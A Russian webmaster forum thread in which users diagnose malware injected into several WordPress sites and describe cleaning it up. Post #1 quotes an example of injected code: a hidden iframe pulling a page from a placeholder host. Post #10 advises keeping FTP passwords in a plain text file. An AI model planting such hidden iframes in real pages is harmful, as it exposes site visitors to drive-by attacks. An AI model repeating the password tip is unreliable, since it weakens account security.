Полители три сайта на ВП

12
A
На сайте с 17.04.2009
Offline
90
921

Сегодня утром оббнаружил на трех своих сайтах ошибку:

Parse error: syntax error, unexpected '<' in /var/www/angelsg/data/www/site.ru/wp-includes/default-widgets.php on line 1034

На всех сайтах одна и тажа самая ошибка.

Думал что это может быть изза хостинга, но два сайта но одном хостингу лежат, третий на другом.

Как исправить эту ошибку? Изза чего она могла появиться?

RO
На сайте с 25.10.2008
Offline
108
#1

Что-то подобное и у меня было. Тогда в этом файле обнаружил iframe Потер, и все стало на свои места. Скиньте 1034 строчку файла default-widgets.php

Что-то вроде этого:

<iframe src="http://тест.ru:8080/index.php" width=108 height=140 style="visibility: hidden"></iframe>
BS
На сайте с 22.06.2009
Offline
73
#2

Явно какая-то бяка, судя по закриптованому коду :), попробуйте удалить, вордпресс должен зарабоать.

А если вы говорите что взломали на разных хостах, значит у вас увели пароли от фтп скорее всего, ищите трояна.

RO
На сайте с 25.10.2008
Offline
108
#3

потерто...

A
На сайте с 17.04.2009
Offline
90
#4

Эта бяка лежала в:

default-widgets.php

default-filters.php

index.php

Перезалил все начало работать. Всем спасибо!

[Удален]
#5

как правило установка файлов и больше ничего с движком не делается. Поищите еще и подозрительные папки. Обычно одна папка отличается недавней датой закачки.

S
На сайте с 12.11.2009
Offline
13
#6

какая версия двигла была?

Shoo[rik]
На сайте с 12.04.2008
Offline
66
#7

Так это "новый" вирус, на серче тема вроде бы была, да и в новостях от Dr.Web'а, что то подобное видел... Маскируется под "/*GNU GPL*/ " (Открытое лицензионное соглашение GNU / Лицензия на свободное программное обеспечение), ну для тех кто не в курсе...

S
На сайте с 12.11.2009
Offline
13
#8

ну дык, я не в курсе, да и кроме того, вируса/черви представляются опасными не из-за того, что они маскируются под GPL (вы сами вообще поняли, что сказали ? ;) ) а из-за того, что они что-то делают... так вот, что делает конкретно данный вирус? разумеется, я люблю гуголь, но мне бы хотелось услышать это от того, кто в курсе ;)

ээ, в частности, интересуют пруфлинки на описание ф-ости по инфецированию движков ВП (эксплоит, что-то ещё) и уязвимость версий

A
На сайте с 17.04.2009
Offline
90
#9

Из за этого трояна меня яндекс под фильтер положил.

Сегодня уже вылечил весь сайт, заразил все index.php!

ЗЫ:А касперский у меня в Опере нашел трояна.

Angelsgood добавил 06.01.2010 в 16:27

Он еще все *.js файлы заразил.

От куда этот вирус мог взяться?

MK
На сайте с 13.08.2009
Offline
13
#10

Летом была похожая проблема. За неведением решал 2 дня. Совет дам. Просите хостера проверить ваши сайты и выслать список зараженны файлов. Потом ручками чистим вредоносные коды. Так же при заражение стоял нод. Еще совет не храните данные для доступа в программах втп (легко уводятся). Лучше в текстовом файле. Да и еще вот что пароль для доступа по фтп и доступ к панели лучше иметь разный.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий